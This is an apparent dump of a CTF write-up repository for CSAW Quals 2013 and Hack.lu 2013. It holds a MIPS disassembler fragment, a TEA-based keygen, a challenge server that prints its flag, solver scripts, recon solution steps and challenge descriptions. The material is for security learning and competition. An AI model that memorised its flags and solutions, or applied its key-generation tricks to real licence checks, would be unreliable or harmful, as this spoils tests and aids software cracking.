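        name = R_TYPE.get(f["funct"])
        if name in ("sll", "srl"):
            return f"{name} {rd}, {rt}, {f['shamt']}"
        if name:
            return f"{name} {rd}, {rs}, {rt}"
    elif f["opcode"] in I_TYPE:
        name = I_TYPE[f["opcode"]]
        if name == "addi":
            return f"addi {rt}, {rs}, {f['imm']:#x}"
        if name == "lw":
            return f"lw {rt}, {rs}, {f['imm']}"
        return f"bne {rs}, {rt}, {f['imm']}"
    return f".word {word:#010x}"  # anything this table does not know


def decode_program(words=WORDS):
    return [disassemble(int(w, 16)) for w in words]


def straight_line_regs(words, count):
    """Evaluate the first `count` words; they must be add/addi/sll only."""
    regs = [0] * 32
    for w in words[:count]:
        f = fields(int(w, 16))
        if f["opcode"] == 0x08:
            imm = f["imm"] - 0x10000 if f["imm"] & 0x8000 else f["imm"]
            regs[f["rt"]] = (regs[f["rs"]] + imm) & 0xFFFFFFFF
        elif f["opcode"] == 0 and f["funct"] == 0x20:
            regs[f["rd"]] = (regs[f["rs"]] + regs[f["rt"]]) & 0xFFFFFFFF
        elif f["opcode"] == 0 and f["funct"] == 0x00:
            regs[f["rd"]] = (regs[f["rt"]] << f["shamt"]) & 0xFFFFFFFF
        else:
            raise ValueError("not straight-line arithmetic")
        regs[0] = 0  # $zero is hard-wired
    return regs


if __name__ == "__main__":
    for index, text in enumerate(decode_program()):
        print(f"{index:2d}  {WORDS[index].lower()}  {text}")
    print("constant built in $t1:", hex(straight_line_regs(WORDS, 8)[9]))
```

The decoded `bne` immediate is 16, the zero-based index of the `loop:` instruction, where the listing writes 17 (its line number). The constant built in `$t1` is the same `delta` that `keygen.cpp` uses in its TEA loop.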
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/keygen.cpp:
--------------------------------------------------------------------------------
1 | #include <iostream>
2 | #include <stdint.h>
3 | #include <string>
4 | /***********************************
5 | * Keygenerator for CSAW Challenge *
6 | * Jeffrey Crowell *
7 | * used in solution and server *
8 | ***********************************/
9 |
10 |
11 | typedef unsigned char uchar;
12 | typedef unsigned int uint;
13 | typedef struct keys keys;
14 |
15 | using namespace std;
16 |
17 | //simple pair of uints for returning from encrypt
18 | struct keys
19 | {
20 | uint v0;
21 | uint v1;
22 | };
23 |
24 | //TEA off of the wikipedia page :-)
25 | keys encrypt (uint32_t* v, uint32_t* k) {
26 | uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
27 | uint32_t delta=0x9e3779b9; /* a key schedule constant */
28 | uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
29 | for (i=0; i < 32; i++) { /* basic cycle start */
30 | sum += delta;
31 | v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
32 | v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
33 | } /* end cycle */
34 | keys s = {v0, v1};
35 | return s;
36 | }
37 |
38 |
39 | int main(int argc, char** argv)
40 | {
41 | uint v[2];
42 | uint k[4];
43 | string input(argv[1]);
44 | if(input.length() < 16) //less than 16 chars makes the keys not work
45 | {
46 | cout << "input must be at least 16 characters" << endl;
47 | cout << "you provided only " << input.length() << " characters" << endl;
48 | return 0;
49 | }
50 | v[0] = (input[0] << 24) | (input[1] << 16) | (input[2] << 8) | (input[3]); //fill up the plaintext
51 | v[1] = (input[4] << 24) | (input[5] << 16) | (input[6] << 8) | (input[7]);
52 | string inrev(input.rbegin(), input.rend()); //reverse input
53 | k[0] = (inrev[0] << 24) | (inrev[1] << 16) | (inrev[2] << 8) | (inrev[3]); //fill up the keys
54 | k[1] = (inrev[4] << 24) | (inrev[5] << 16) | (inrev[6] << 8) | (inrev[7]);
55 | k[2] = (inrev[8] << 24) | (inrev[9] << 16) | (inrev[10] << 8) | (inrev[11]);
56 | k[3] = (inrev[12] << 24) | (inrev[13] << 16) | (inrev[14] << 8) | (inrev[15]);
57 | keys s = encrypt(v, k); //encrypt the input under the reverse input
58 | uint temp1 = s.v1 ^ 0x31333337; //this part is just to make it so that it isn't straight TEA as from the vm binary
59 | uchar ch1 = ((s.v0 & 0xFFFFFFFF) >> 24);
60 | uchar ch2 = ((s.v0 & 0x00FF0000) >> 16);
61 | uchar ch3 = ((s.v0 & 0x0000FF00) >> 8);
62 | uchar ch4 = ((s.v0 & 0x000000FF));
63 | uint temp2 = (ch3 << 24) | (ch1 << 16) | (ch2 << 8) | (ch4);
64 | cout << temp1 << " " << temp2 << endl; //print out the keys, for use in the solver and the server
65 | }
66 |
67 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/server.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 | require 'timeout'
3 | require 'securerandom'
4 |
5 | '''
6 | keygenme server for CSAW CTF 2013
7 | Jeffrey Crowell
8 |
9 | Users must get 10 correct serials
10 | within 5 seconds each
11 | '''
12 |
13 |
14 | server = TCPServer.open(2000) # Socket to listen on port 2000
15 | loop { # Servers run forever
16 | Thread.start(server.accept) do |client|
17 | sock_domain, remote_port, remote_hostname, remote_ip = client.peeraddr
18 | puts "connection from #{remote_hostname} #{remote_ip} #{remote_port}"
19 | client.puts "welcome to the activation server\r\n"
20 | (0..9).each{|i|
21 | user = SecureRandom.urlsafe_base64(16)
22 | keys = `./keygen #{user}`.strip
23 | client.puts("give me the password for #{user}")
24 | begin
25 | Timeout::timeout(5) do
26 | pass = client.gets.chomp.strip
27 | if pass == keys
28 | client.puts(":-)")
29 | else
30 | client.puts("wrong password :'-(")
31 | client.close
32 | end
33 | end
34 | rescue Timeout::Error
35 | client.puts("too slow :'-(")
36 | client.close
37 | end
38 | }
39 | client.puts "here's the flag key{vM_k3yg3n_a1n7_n0_th4ng}"
40 | puts "solve from #{remote_hostname} #{remote_ip} #{remote_port}"
41 | client.close # Disconnect from the client
42 | end
43 | }
44 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solver.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 |
3 | """
4 | keygenme solver for CSAW CTF 2013
5 | Jeffrey Crowell
6 | top sekret solution
7 |
8 | """
9 |
10 | host = '128.238.66.219'
11 | port = '14549'
12 | socket = TCPSocket.open(host, port)
13 | s = socket.gets.strip
14 | puts "SERVER: #{s}"
15 | (0..9).each{|i|
16 | s = socket.gets.strip
17 | puts "SERVER: #{s}"
18 | m = s.split(" ")
19 | u = m[-1]
20 | k = IO.popen(['./keygen', u], &:read).strip # argv form: the server-supplied username never reaches a shell
21 | puts "KEYGEN: #{k}"
22 | socket.puts(k)
23 | s = socket.gets.strip
24 | puts "SERVER: #{s}"
25 | }
26 |
27 | s = socket.gets.strip
28 | puts "FLAG: #{s}"
29 |
30 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solvertest.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 |
3 | """
4 | keygenme solver for CSAW CTF 2013
5 | Jeffrey Crowell
6 | top sekret solution
7 |
8 | """
9 |
10 | host = '128.238.66.219'
11 | port = '111111'
12 | socket = TCPSocket.open(host, port)
13 | s = socket.gets.strip
14 | puts "SERVER: #{s}"
15 | (0..9).each{|i|
16 | s = socket.gets.strip
17 | puts "SERVER: #{s}"
18 | m = s.split(" ")
19 | u = m[-1]
20 | k = IO.popen(['./keygen', u], &:read).strip # argv form: the server-supplied username never reaches a shell
21 | puts "KEYGEN: #{k}"
22 | socket.puts(k)
23 | s = socket.gets.strip
24 | puts "SERVER: #{s}"
25 | }
26 |
27 | s = socket.gets.strip
28 | puts "FLAG: #{s}"
29 |
30 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Noobs First Firmware Mod
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Solves:** 40
6 | **Description:**
7 |
8 | > N00b firmware modder says: "My first u-boot mod, there might be errors :("
9 | >
10 | > [noobs-first-firmware-mod.tgz](noobs-first-firmware-mod.tgz)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz
--------------------------------------------------------------------------------
/csaw-quals-2013/solves.txt:
--------------------------------------------------------------------------------
1 | network1-50 1004
2 | guess-harder-100 985
3 | network2-50 864
4 | black-and-white-100 818
5 | exploit1-100 701
6 | dotnet-100 662
7 | csaw2013reversing1-100 644
8 | csaw2013reversing2-200 357
9 | bikinibonanza-150 316
10 | nevernote-200 307
11 | deeeeeeaaaaaadbeeeeeeeeeef-200 224
12 | life-300 212
13 | exploit2-200 198
14 | crackme-300 174
15 | csawpad-100 141
16 | onlythisprogram-300 127
17 | csawdiary-300 116
18 | keygenme-400 100
19 | widgetcorp-400 99
20 | herpderper-300 89
21 | miteegashun-400 85
22 | impossible-500 82
23 | cryptomatv2-400 45
24 | noobs-first-firmware-mod-500 40
25 | slurp-500 27
26 | scp-hack-500 7
27 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/cryptomatv2-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CryptoMatv2
2 |
3 | **Category:** Web
4 | **Points:** 400
5 | **Solves:** 45
6 | **Description:**
7 |
8 | > Cryptomat is back! You know the drill. Get the key from Dog.
9 | >
10 | > http://128.238.66.225
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/guess-harder-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Guess Harder
2 |
3 | **Category:** Web
4 | **Points:** 100
5 | **Solves:** 985
6 | **Description:**
7 |
8 | > http://128.238.66.215
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Herpderper
2 |
3 | **Category:** Web
4 | **Points:** 300
5 | **Solves:** 89
6 | **Description:**
7 |
8 | > [herpderper.apk](herpderper.apk)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/herpderper-300/herpderper.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/web/herpderper-300/herpderper.apk
--------------------------------------------------------------------------------
/csaw-quals-2013/web/nevernote-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Nevernote
2 |
3 | **Category:** Web
4 | **Points:** 200
5 | **Solves:** 307
6 | **Description:**
7 |
8 | > http://128.238.66.214
9 | > from: Nevernote Admin
10 | > to: challenger@ctf.isis.poly.edu
11 | > date: Thurs, Sep 19, 2013 at 3:05 PM
12 | > subject: Help
13 | >
14 | > Friend,
15 | > Evil hackers have taken control of the Nevernote server and locked me out. While I'm working on restoring access, is there any way you can get in to my account and save a copy of my notes? I know the system is super secure but if anybody can do it - it's you.
16 | > Thanks,
17 | > Nevernote Admin
18 |
19 | ## Write-up
20 |
21 | (TODO)
22 |
23 | ## Other write-ups and resources
24 |
25 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/alex-taylor.txt:
--------------------------------------------------------------------------------
1 | Alexander Taylor - 100 Points
2 | Solved by 134 teams.
3 |
4 | Alexander Taylor
5 | https://www.google.com/search?&q=Alexander+Taylor
6 |
7 | 1) Grab photo from judges page
8 | 2) Strings/analyze
9 | 3) Notice unusual chunks
10 | 4) extract bogus ones
11 | 5) xor
12 | 6) ???
13 | 7) profit
14 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/brandon-edwards.txt:
--------------------------------------------------------------------------------
1 | Brandon Edwards - 100 Points
2 | Solved by 425 teams.
3 |
4 | Brandon Edwards
5 | https://www.google.com/search?&q=Brandon+Edwards
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/historypeats.txt:
--------------------------------------------------------------------------------
1 | historypeats - 100 Points
2 | Solved by 607 teams.
3 |
4 | historypeats
5 | https://www.google.com/search?&q=historypeats
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/jordan-wiens.txt:
--------------------------------------------------------------------------------
1 | Jordan Wiens - 100 Points
2 | Solved by 188 teams.
3 |
4 | http://key.psifertex.com
5 |
6 |
7 | 1) key.psifertex.com contains: "Michael Vario sure does some suspicious signs, hope he doesn't do me"
8 | 2) Google "Michael Vario", see multiple results about weird PGP key signing he does.
9 | 3) Search jordan wiens on any public keyserver: http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x9FBEBC5EA827D636
10 | 4) 'getting warmer!' in gpg key name
11 |
12 | 5a) search for analyze pgp and follow http://www.macfreek.nl/memory/Analysing_PGP_Identities
13 |
14 | or
15 |
16 | 5b) just import key into thunderbird. notice picture.
17 |
18 | or
19 |
20 | 5c) search/import with gpg, use gpg 'showpicture' function to show image
21 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/julian-cohen.txt:
--------------------------------------------------------------------------------
1 | Julian Cohen - 100 Points
2 | Solved by 258 teams.
3 |
4 | Julian Cohen
5 | https://www.google.com/search?&q=Julian+Cohen
6 |
7 |
8 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/kevin-chung.txt:
--------------------------------------------------------------------------------
1 | Kevin Chung - 100 Points
2 | Solved by 292 teams.
3 |
4 | Kevin Chung
5 | https://www.google.com/search?&q=Kevin+Chung
6 |
7 | 1) add 'security' or 'poly' to kevin's search:
8 | 2) find codekevin.com
9 | 3) shows hint that no key there, but references 'graduation'
10 | 4) https://www.google.com/search?&q=Kevin+Chung+high+school
11 | 5) Page 3 finds: https://hsf.isis.poly.edu/previous_winners
12 | 6) Which points to: https://hsf.isis.poly.edu/assets/uploads/pages/previous_winners/key.txt
13 |
14 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/odin.txt:
--------------------------------------------------------------------------------
1 | Odin - 100 Points
2 | Solved by 165 teams.
3 |
4 | Odin
5 | https://www.google.com/search?&q=Odin
6 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/theodore-reed.txt:
--------------------------------------------------------------------------------
1 | Theodore Reed - 100 Points
2 | Solved by 115 teams.
3 |
4 | http://prosauce.org
5 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/widgetcorp-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: WidgetCorp
2 |
3 | **Category:** Web
4 | **Points:** 400
5 | **Solves:** 99
6 | **Description:**
7 |
8 | > http://128.238.66.224
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013 write-ups
2 |
3 | *
4 | * [Scoreboard](https://ctf.fluxfingers.net/2013/scoreboard)
5 |
6 | ## Completed write-ups
7 |
8 | * none yet
9 |
10 | ## External write-ups only
11 |
12 | * [Beer Pump Filtration](misc/Beer-Pump-Filtration)
13 | * [BREW'r'Y](crypto/BREW-r-Y)
14 | * [ECKA](crypto/ECKA)
15 | * [ELF](reversing/ELF)
16 | * [FluxArchiv (Part 1)](reversing/FluxArchiv-Part1)
17 | * [FluxArchiv (Part 2)](reversing/FluxArchiv-Part2)
18 | * [Geier's Lambda](crypto/Geier-s-Lambda)
19 | * [Geolocation Flag](misc/Geolocation-Flag)
20 | * [Marvin is plain-Jane](crypto/Marvin-is-plain-Jane)
21 | * [Packed](internals/Packed)
22 | * [Pay TV](web/Pay-TV)
23 | * [RoboAuth](reversing/RoboAuth)
24 | * [Roboparty](misc/Roboparty)
25 | * [Robot Plans](internals/Robot-Plans)
26 | * [Robotic Superiority](exploiting/Robotic-Superiority)
27 | * [Robots Exclusion Committee](web/Robots-Exclusion-Committee)
28 | * [Wannabe](exploiting/Wannabe)
29 | * [What's wrong with this?](internals/What-s-wrong-with-this)
30 |
31 | ## Missing write-ups
32 |
33 | * [Breznparadisebugmaschine](exploiting/Breznparadisebugmaschine)
34 | * [For whom the bell tolls](misc/For-whom-the-bell-tolls)
35 | * [OTP](misc/OTP)
36 |
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/BREW-r-Y/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: BREW'r'Y
2 |
3 | **Category:** Crypto
4 | **Points:** 350
5 | **Author:** dwuid
6 | **Description:**
7 |
8 | > Finally, the robots managed to sneak into one of our breweries. I guess I won't have to explain how bad that really is. That darn non-physical ones even shutdown our login system. Shiny thing, advanced technology, all based on fingerprints. Been secure as hell. If only it was running. Well, basically, we're screwed.
9 | > But wait, there's hope. Seems like they didn't shutdown our old login system. Backward compatibility's a bitch, eh? Unfortunately, we got like _zero_ knowledge about the protocol. I mean come on, the last time we used that thingy was like decades ago. If we are lucky, the old authentication method is buggy.
10 | > So, I heard you're kinda smart? Have a look at it. We desperately need to get drunk^W supply. You'll find the old system at ctf.fluxfingers.net:1335. Good luck.
11 | >
12 | > Hint: Data is - and is expected to be - compressed using zlib.
13 | > Hint: The challenge text gives hints about the protocol involved. We updated it in order to reflect that fact.
14 |
15 | ## Write-up
16 |
17 | None
18 |
19 | ## Other write-ups and resources
20 |
21 | [More Smoked Leet Chicken](http://mslc.ctf.su/wp/hack-lu-2013-ctf-crypto-350-brewry)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/ECKA/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: ECKA
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey you!
9 | > Come over and help me, please. We discovered a strange key agreement protocol used on this server: ctf.fluxfingers.net:1330.
10 | > They send a curve which they use later. But we think the robots are a bit UBER-cautious and do not use the curve's P. So they first exchange their public point with a technique we could not figure out. It looks like they do not need a public key for this step.
11 | > Afterwards they use another technique to agree on a key which they ultimately use to send some encrypted password.
12 | >
13 | > We need this last password to shut down the robo-factory on our way to the Oktoberfest.
14 | >
15 | > Oh btw, the robots use AES-ECB for symmetric encryption.
16 | >
17 | > Hint: He, we have the latest news for you. The first part of their strange key agreement was designed by the famous SHA-Robot Мир!
18 | > For all robo hunters out there: Your quest-description was updated - check it!
19 |
20 | ## Write-up
21 |
22 | None
23 |
24 | ## Other write-ups and resources
25 |
26 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Geier-s-Lambda/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Geier's Lambda
2 |
3 | **Category:** Crypto
4 | **Points:** 200
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey!
9 | > We need your help. Our agent found some details about a huge conspiracy. Looks like they wanna plant a bomb near the Oktoberfest's main fairground ride. But we have a good chance, to get the defusing-password. That's where you have to jump in. We managed to steal the encrypted password along with a decryption file. Our agent also started to work on it, but one of the robots caught him and now we are left-behind with his infos.
10 | >
11 | > He found a collision on the real password but wasn't sure if he can use that one. But here it is: “Le1sRI6I” - perhaps you have better luck. He also found out that the robots only use alphanumeric characters and that the collision is of the same length as the real password. The last thing he told us is that the defusing password must contain only printable characters.
12 | >
13 | > Hope that helps you! And now hurry!
14 | >
15 | > Here is your challenge: [pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs](pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs)
16 |
17 | ## Write-up
18 |
19 | None
20 |
21 | ## Other write-ups and resources
22 |
23 | * [http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html](http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Geier-s-Lambda/pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs:
--------------------------------------------------------------------------------
1 | #!/usr/bin/runhaskell
2 | {-# LANGUAGE NoMonomorphismRestriction #-}
3 |
4 | import Data.Bits
5 | import Data.Char
6 | import Data.Word
7 | import System.Environment
8 | import Numeric
9 |
10 | -- known Collision: "Le1sRI6I"
11 |
12 | flag = 0xce97a7b6d709fb62
13 |
14 | main = p =<< getArgs
15 | where p (pwd:_) = print $ dec flag $ toKey pwd
16 | p _ = return ()
17 |
18 | hash :: String -> Word32
19 | hash = fromIntegral.(\(a,b)->(b`shift`16).|.a).foldl r (1, 0)
20 | where r = \(a,b) x->(a+(ord x.&.0xff),(a+(ord x.&.0xff)+b))
21 |
22 | dec :: Word64 -> Word32 -> Word64
23 | dec v k = fin $ foldl r (3337565984,v0,v1) [0..31] where
24 | v0 = fromIntegral v :: Word32
25 | v1 = fromIntegral $ v `shiftR` 32 :: Word32
26 | s' = \a->a-d
27 | r = \(s,x,y) _-> let y' = update y x s k (-)
28 | x' = update x y' s k (-)
29 | in (s' s, x', y')
30 |
31 | update = \a b c d f->f a (((b`shift`4) + d)`xor`(b+c)`xor`((b`shiftR`5) + d))
32 | fin = \(_,x,y)->fromIntegral y`shiftL`32.|.(fromIntegral x.&.0xffffffff)
33 |
34 | toHexStr s = concat $ "0x":map (flip showHex "".ord) s
35 | toKey s = k0 where
36 | s' = toHexStr s
37 | k0 = read ("0x"++(take 8$drop 2 s')) :: Word32
38 |
39 |
40 | d = 2654435769
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Marvin-is-plain-Jane/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Marvin is plain-Jane
2 |
3 | **Category:** Crypto
4 | **Points:** 100
5 | **Author:** asante
6 | **Description:**
7 |
8 | > Hey mister super-duper robo-dabster. We need you to tell us, what Marvin is!
9 | >
10 | > What we know:
11 | >
12 | > Marvin is
13 | > using brainpool p256r1.
14 | > His friend is called meneze or something. Or was it van-stone?
15 | >
16 | > What we heard:
17 | >
18 | > (23372093078317551665216159139784413411806753229249201681647388827754827452856 : 1)
19 | > 71164450240897430648972143714791734771985061339722673162401654668605658194656
20 | > 12951693517100633909800921421096074083332346613461419370069191654560064909824
21 | > What we need to know:
22 | >
23 | > What Marvin is
24 |
25 | ## Write-up
26 |
27 | None
28 |
29 | ## Other write-ups and resources
30 |
31 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Breznparadisebugmaschine
2 |
3 | **Category:** Exploiting
4 | **Points:** 500
5 | **Author:** martin, flandy
6 | **Description:**
7 |
8 | > The robot forces modified our beloved Breznparadisebackmaschine. This machine stores our secret, traditional Brezn recipe. Yet, we forgot the last secret ingredient and cannot access the Breznparadisebackmaschine anymore. However, Brezn are crucial for our party, as only paradise Brezn provide us the nice and warm feeling in our guts.
9 | >
10 | > We need you to recover the important ingredient! Here is everything we could remember from the recipe:
11 | >
12 | > For The Dough
13 | > 1 kg Plain White Flour (around 9 - 12 % protein)
14 | > 260 ml milk (lukewarm)
15 | > 260 ml water (lukewarm)
16 | > 80 g Butter (unsalted)
17 | > 1 tbsp malt extract (liquid or dried, or brown sugar)
18 | > 2 tsp fast action dried yeast (or 42g fresh if using)
19 | > 2 tbsp Salt (unrefined)
20 | > For The Finishing Solution
21 | > 1 L Water
22 | > 3 tbsp Baking Soda (or lye if you're using it)
23 | > Secret Ingredient
24 | >
25 | > Please, we need to know that ingredient to make everyone happy again!
26 | > [Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe](Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe)
27 | > ctf.fluxfingers.net:1340
28 | > Brezelparadisebackmaschinefirmware: Windows 2012
29 | >
30 | > Announcements:
31 | > Ah, perhaps it helps you to know, that our Breznparadisebugmaschinefirmware is up to date with Windows 2012.
32 |
33 | ## Write-up
34 |
35 | None
36 |
37 | ## Other write-ups and resources
38 |
39 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Robotic-Superiority/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robotic Superiority
2 |
3 | **Category:** Exploiting
4 | **Points:** 250
5 | **Author:** lama
6 | **Description:**
7 |
8 | > Help us fight the evil robotic lieutenant Don Sim. He wants to spread robo propaganda to cover his actions on the Oktoberfest. But he needs good video footage for that. So he created an IRC bot that collects information about robots in movies. Robotic emancipation can NOT happen, you have to stop him! All we need is his private key. Our agents located the bot, here is all we know about it:
9 | >
10 | > Server: irc://ctf.fluxfingers.net:1313
11 | > Bot: lib[1-5] (load balancer)
12 | > Key: /var/private/key.txt
13 | >
14 | > Hint: All available commands are listed with "help". 3 connections allowed per ip.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority](http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Wannabe/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Wannabe
2 |
3 | **Category:** Exploiting
4 | **Points:** 400
5 | **Author:** r1cky
6 | **Description:**
7 |
8 | > One of our informants met a guy who calls himself Elite Arthur, he is a real jackass, and he thinks he is the best hacker alive. We got reason to believe that the robots hired him to write the firmwares for their weapons. But to write such a firmware we need the key to sign the code. Luckily for us, our informant also found his website: …. your job is to hack the server, find the flag and show this little cocksucker how skilled he really is. We count on you.
9 | > Here is your challenge: https://ctf.fluxfingers.net:1317. Alternatively, you can reach the challenge without a reverse proxy but also without SSL here: http://ctf.fluxfingers.net:1339
10 | >
11 | > Announcement: Okay you can stop struggling now: XSS is not the way; leave the http cookie alone; get RIP to do the final trick!
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe)
20 | * [https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation](https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation)
21 |
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Packed/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Packed
2 |
3 | **Category:** Internals
4 | **Points:** 200
5 | **Author:** freddyb
6 | **Description:**
7 |
8 | > We just found a dead robot. It seems there is some useful data left but somehow it got confused with other data and now we don't know what's useful and what's junk. We just know there is only one way to go but there are many dead ends.
9 | > Here is the challenge: [packed_7245b354be136111061c9a118d6304598f46c767](packed_7245b354be136111061c9a118d6304598f46c767)
10 | >
11 | > Announcements:
12 | > Think outside the box - being several types at once like an animal that can change its color. Excuse the inaccuracy, but that's what you're searching for.
13 |
14 | ## Write-up
15 |
16 | None
17 |
18 | ## Other write-ups and resources
19 |
20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Robot-Plans/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robot Plans
2 |
3 | **Category:** Internals
4 | **Points:** 150
5 | **Author:** DrunkenPanda
6 | **Description:**
7 |
8 | > We have captured a robot from behind, while he dropped some cooling liquid into the bushes. We tried to interrogate the robot, but he still refuses to speak. Luckily we could extract files from the android's communication module. Hopefully we get some information about the robots' motives, before every information is swiped away...
9 | > Here is the challenge: [https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz](https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz)
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
